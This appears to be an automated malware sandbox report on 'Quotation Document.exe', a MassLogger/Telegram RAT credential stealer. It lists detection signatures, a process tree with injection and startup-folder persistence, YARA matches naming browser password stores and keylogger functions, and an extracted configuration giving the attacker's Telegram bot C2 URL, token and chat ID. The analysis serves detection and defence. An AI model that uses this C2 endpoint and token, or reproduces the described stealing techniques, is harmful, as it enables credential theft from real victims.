Edit tour

Windows Analysis Report
Quotation Document.exe

Overview

General Information

Sample name:	Quotation Document.exe
Analysis ID:	1546477
MD5:	cd3c7f532dcffd81361915bf691cfbd0
SHA1:	ddaa78fa6df0b9f19a0b7c9e8f54c4224f6a7a14
SHA256:	5e3521bee81bb39dae47648627ea8810f88dc0a16055efa1eadd779f804f60f1
Tags:	exeuser-threatcat_ch
Infos:

Detection

MassLogger RAT, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected AntiVM3

Yara detected MassLogger RAT

Yara detected PureLog Stealer

Yara detected Telegram RAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code references suspicious native API functions

AI detected suspicious sample

Contains functionality to log keystrokes (.Net Source)

Drops VBS files to the startup folder

Initial sample is a PE file and has a suspicious name

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

PE file contains an invalid checksum

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Quotation Document.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\Quotation Document.exe" MD5: CD3C7F532DCFFD81361915BF691CFBD0)

neophobia.exe (PID: 7760 cmdline: "C:\Users\user\Desktop\Quotation Document.exe" MD5: CD3C7F532DCFFD81361915BF691CFBD0)

RegSvcs.exe (PID: 8080 cmdline: "C:\Users\user\Desktop\Quotation Document.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

wscript.exe (PID: 2000 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

neophobia.exe (PID: 1900 cmdline: "C:\Users\user\AppData\Local\emboweling\neophobia.exe" MD5: CD3C7F532DCFFD81361915BF691CFBD0)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7479124552:AAELHYVLYxHEQdxzK-H17KRix-YKXifzKCI/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7479124552:AAELHYVLYxHEQdxzK-H17KRix-YKXifzKCI", "Telegram Chatid": "5679778644"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B3 88 44 24 2B 88 44 24 2F B0 B8 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5e386:$a1: get_encryptedPassword 0x5e35a:$a2: get_encryptedUsername 0x5e41e:$a3: get_timePasswordChanged 0x5e336:$a4: get_passwordField 0x5e39c:$a5: set_encryptedPassword 0x5e169:$a7: get_logins 0x5d6d7:$a8: GetOutlookPasswords 0x5cbeb:$a9: StartKeylogger 0x5b645:$a10: KeyLoggerEventArgs 0x5b614:$a11: KeyLoggerEventArgsEventHandler 0x5e23d:$a13: _encryptedPassword
00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1d788:$a1: get_encryptedPassword 0x1d75c:$a2: get_encryptedUsername 0x1d820:$a3: get_timePasswordChanged 0x1d738:$a4: get_passwordField 0x1d79e:$a5: set_encryptedPassword 0x1d56b:$a7: get_logins 0x1cad9:$a8: GetOutlookPasswords 0x1bfed:$a9: StartKeylogger 0x1aa47:$a10: KeyLoggerEventArgs 0x1aa16:$a11: KeyLoggerEventArgsEventHandler 0x1d63f:$a13: _encryptedPassword
00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x21e83:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21381:$a3: \Google\Chrome\User Data\Default\Login Data 0x2168f:$a4: \Orbitum\User Data\Default\Login Data 0x22487:$a5: \Kometa\User Data\Default\Login Data
00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c8a0:$a1: get_encryptedPassword 0x1c874:$a2: get_encryptedUsername 0x1c938:$a3: get_timePasswordChanged 0x1c850:$a4: get_passwordField 0x1c8b6:$a5: set_encryptedPassword 0x1c683:$a7: get_logins 0x1bbf1:$a8: GetOutlookPasswords 0x1b105:$a9: StartKeylogger 0x19b5f:$a10: KeyLoggerEventArgs 0x19b2e:$a11: KeyLoggerEventArgsEventHandler 0x1c757:$a13: _encryptedPassword
00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20f9b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20499:$a3: \Google\Chrome\User Data\Default\Login Data 0x207a7:$a4: \Orbitum\User Data\Default\Login Data 0x2159f:$a5: \Kometa\User Data\Default\Login Data
00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x21cf8:$a1: get_encryptedPassword 0x4a030:$a1: get_encryptedPassword 0x21ccc:$a2: get_encryptedUsername 0x4a004:$a2: get_encryptedUsername 0x21d90:$a3: get_timePasswordChanged 0x4a0c8:$a3: get_timePasswordChanged 0x21ca8:$a4: get_passwordField 0x49fe0:$a4: get_passwordField 0x21d0e:$a5: set_encryptedPassword 0x4a046:$a5: set_encryptedPassword 0x21adb:$a7: get_logins 0x49e13:$a7: get_logins 0x21049:$a8: GetOutlookPasswords 0x49381:$a8: GetOutlookPasswords 0x2055d:$a9: StartKeylogger 0x48895:$a9: StartKeylogger 0x1efb7:$a10: KeyLoggerEventArgs 0x472ef:$a10: KeyLoggerEventArgs 0x1ef86:$a11: KeyLoggerEventArgsEventHandler 0x472be:$a11: KeyLoggerEventArgsEventHandler 0x21baf:$a13: _encryptedPassword
00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 8080	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 8080	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 8080	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 8080	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 8080	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1815b:$a1: get_encryptedPassword 0x3716d:$a1: get_encryptedPassword 0x5b104:$a1: get_encryptedPassword 0x6ab78:$a1: get_encryptedPassword 0x1812f:$a2: get_encryptedUsername 0x37141:$a2: get_encryptedUsername 0x5b0d8:$a2: get_encryptedUsername 0x6ab4c:$a2: get_encryptedUsername 0x181f3:$a3: get_timePasswordChanged 0x37205:$a3: get_timePasswordChanged 0x5b19c:$a3: get_timePasswordChanged 0x6ac10:$a3: get_timePasswordChanged 0x1810b:$a4: get_passwordField 0x3711d:$a4: get_passwordField 0x5b0b4:$a4: get_passwordField 0x6ab28:$a4: get_passwordField 0x18171:$a5: set_encryptedPassword 0x37183:$a5: set_encryptedPassword 0x5b11a:$a5: set_encryptedPassword 0x6ab8e:$a5: set_encryptedPassword 0x17f47:$a7: get_logins
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B3 88 44 24 2B 88 44 24 2F B0 B8 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.RegSvcs.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B3 88 44 24 2B 88 44 24 2F B0 B8 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
7.2.RegSvcs.exe.2ba0000.4.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.2ba0000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.2ba0000.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.2ba0000.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.2ba0000.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1b988:$a1: get_encryptedPassword 0x1b95c:$a2: get_encryptedUsername 0x1ba20:$a3: get_timePasswordChanged 0x1b938:$a4: get_passwordField 0x1b99e:$a5: set_encryptedPassword 0x1b76b:$a7: get_logins 0x1acd9:$a8: GetOutlookPasswords 0x1a1ed:$a9: StartKeylogger 0x18c47:$a10: KeyLoggerEventArgs 0x18c16:$a11: KeyLoggerEventArgsEventHandler 0x1b83f:$a13: _encryptedPassword
7.2.RegSvcs.exe.3c55570.6.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.3c55570.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.3c55570.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.3c55570.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.3c55570.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1b988:$a1: get_encryptedPassword 0x1b95c:$a2: get_encryptedUsername 0x1ba20:$a3: get_timePasswordChanged 0x1b938:$a4: get_passwordField 0x1b99e:$a5: set_encryptedPassword 0x1b76b:$a7: get_logins 0x1acd9:$a8: GetOutlookPasswords 0x1a1ed:$a9: StartKeylogger 0x18c47:$a10: KeyLoggerEventArgs 0x18c16:$a11: KeyLoggerEventArgsEventHandler 0x1b83f:$a13: _encryptedPassword
7.2.RegSvcs.exe.2830bfe.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.2830bfe.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.2830bfe.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.2830bfe.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.3c55570.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20083:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1f581:$a3: \Google\Chrome\User Data\Default\Login Data 0x1f88f:$a4: \Orbitum\User Data\Default\Login Data 0x20687:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.2ba0000.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20083:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1f581:$a3: \Google\Chrome\User Data\Default\Login Data 0x1f88f:$a4: \Orbitum\User Data\Default\Login Data 0x20687:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.2830bfe.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1d788:$a1: get_encryptedPassword 0x1d75c:$a2: get_encryptedUsername 0x1d820:$a3: get_timePasswordChanged 0x1d738:$a4: get_passwordField 0x1d79e:$a5: set_encryptedPassword 0x1d56b:$a7: get_logins 0x1cad9:$a8: GetOutlookPasswords 0x1bfed:$a9: StartKeylogger 0x1aa47:$a10: KeyLoggerEventArgs 0x1aa16:$a11: KeyLoggerEventArgsEventHandler 0x1d63f:$a13: _encryptedPassword
7.2.RegSvcs.exe.2830bfe.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x21e83:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21381:$a3: \Google\Chrome\User Data\Default\Login Data 0x2168f:$a4: \Orbitum\User Data\Default\Login Data 0x22487:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.2830bfe.1.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.2830bfe.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.2830bfe.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.2830bfe.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.3c7e790.5.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.3c7e790.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.3c7e790.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.3c7e790.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.2830bfe.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1b988:$a1: get_encryptedPassword 0x1b95c:$a2: get_encryptedUsername 0x1ba20:$a3: get_timePasswordChanged 0x1b938:$a4: get_passwordField 0x1b99e:$a5: set_encryptedPassword 0x1b76b:$a7: get_logins 0x1acd9:$a8: GetOutlookPasswords 0x1a1ed:$a9: StartKeylogger 0x18c47:$a10: KeyLoggerEventArgs 0x18c16:$a11: KeyLoggerEventArgsEventHandler 0x1b83f:$a13: _encryptedPassword
7.2.RegSvcs.exe.3c7e790.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1aaa0:$a1: get_encryptedPassword 0x1aa74:$a2: get_encryptedUsername 0x1ab38:$a3: get_timePasswordChanged 0x1aa50:$a4: get_passwordField 0x1aab6:$a5: set_encryptedPassword 0x1a883:$a7: get_logins 0x19df1:$a8: GetOutlookPasswords 0x19305:$a9: StartKeylogger 0x17d5f:$a10: KeyLoggerEventArgs 0x17d2e:$a11: KeyLoggerEventArgsEventHandler 0x1a957:$a13: _encryptedPassword
7.2.RegSvcs.exe.2830bfe.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20083:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1f581:$a3: \Google\Chrome\User Data\Default\Login Data 0x1f88f:$a4: \Orbitum\User Data\Default\Login Data 0x20687:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.3c7e790.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1f19b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e699:$a3: \Google\Chrome\User Data\Default\Login Data 0x1e9a7:$a4: \Orbitum\User Data\Default\Login Data 0x1f79f:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.3c56458.7.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.3c56458.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.3c56458.7.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.3c56458.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.3c56458.7.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1aaa0:$a1: get_encryptedPassword 0x1aa74:$a2: get_encryptedUsername 0x1ab38:$a3: get_timePasswordChanged 0x1aa50:$a4: get_passwordField 0x1aab6:$a5: set_encryptedPassword 0x1a883:$a7: get_logins 0x19df1:$a8: GetOutlookPasswords 0x19305:$a9: StartKeylogger 0x17d5f:$a10: KeyLoggerEventArgs 0x17d2e:$a11: KeyLoggerEventArgsEventHandler 0x1a957:$a13: _encryptedPassword
7.2.RegSvcs.exe.3c56458.7.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1f19b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e699:$a3: \Google\Chrome\User Data\Default\Login Data 0x1e9a7:$a4: \Orbitum\User Data\Default\Login Data 0x1f79f:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.2831ae6.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.2831ae6.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.2831ae6.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.2831ae6.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.2831ae6.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c8a0:$a1: get_encryptedPassword 0x1c874:$a2: get_encryptedUsername 0x1c938:$a3: get_timePasswordChanged 0x1c850:$a4: get_passwordField 0x1c8b6:$a5: set_encryptedPassword 0x1c683:$a7: get_logins 0x1bbf1:$a8: GetOutlookPasswords 0x1b105:$a9: StartKeylogger 0x19b5f:$a10: KeyLoggerEventArgs 0x19b2e:$a11: KeyLoggerEventArgsEventHandler 0x1c757:$a13: _encryptedPassword
7.2.RegSvcs.exe.2831ae6.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20f9b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20499:$a3: \Google\Chrome\User Data\Default\Login Data 0x207a7:$a4: \Orbitum\User Data\Default\Login Data 0x2159f:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.2ba0000.4.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.2ba0000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.5090000.8.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.5090000.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.5090000.8.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.5090000.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.5090000.8.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.5090000.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.5090000.8.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.5090000.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.2ba0000.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.2831ae6.2.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.2831ae6.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.2831ae6.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.2831ae6.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.2831ae6.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1aaa0:$a1: get_encryptedPassword 0x1aa74:$a2: get_encryptedUsername 0x1ab38:$a3: get_timePasswordChanged 0x1aa50:$a4: get_passwordField 0x1aab6:$a5: set_encryptedPassword 0x1a883:$a7: get_logins 0x19df1:$a8: GetOutlookPasswords 0x19305:$a9: StartKeylogger 0x17d5f:$a10: KeyLoggerEventArgs 0x17d2e:$a11: KeyLoggerEventArgsEventHandler 0x1a957:$a13: _encryptedPassword
7.2.RegSvcs.exe.2ba0ee8.3.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.2ba0ee8.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.2ba0ee8.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.2ba0ee8.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.3c7e790.5.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.3c7e790.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.3c7e790.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.3c7e790.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.3c55570.6.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.3c55570.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.3c55570.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.3c55570.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.5090000.8.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1aaa0:$a1: get_encryptedPassword 0x1aa74:$a2: get_encryptedUsername 0x1ab38:$a3: get_timePasswordChanged 0x1aa50:$a4: get_passwordField 0x1aab6:$a5: set_encryptedPassword 0x1a883:$a7: get_logins 0x19df1:$a8: GetOutlookPasswords 0x19305:$a9: StartKeylogger 0x17d5f:$a10: KeyLoggerEventArgs 0x17d2e:$a11: KeyLoggerEventArgsEventHandler 0x1a957:$a13: _encryptedPassword
7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
